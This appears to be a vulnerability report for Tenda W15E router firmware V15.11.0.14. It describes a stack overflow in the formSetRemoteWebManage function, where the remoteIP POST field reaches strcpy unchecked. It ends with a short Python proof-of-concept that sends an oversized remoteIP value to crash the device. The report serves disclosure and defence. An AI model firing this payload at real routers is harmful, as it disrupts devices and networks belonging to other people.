- Firmware download website: https://www.tendacn.com/download/detail-2722.html
W15EV1.0 V15.11.0.14
The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formSetRemoteWebManage function. The ip variable receives the remoteIP parameter from a POST request and is used in statement strcpy((char *)temp_value, (const char *)ip);, which caused the buffer overflow attack.
The user-provided remoteIP can trigger this security vulnerability.
import requests
IP = "192.168.84.101"
url = f"http://{IP}/goform/SetRemoteWebManage"
payload = b'a'*2000
data = {"remoteType": 1,"remoteIP": payload}
response = requests.post(url, data=data)
print(response.text)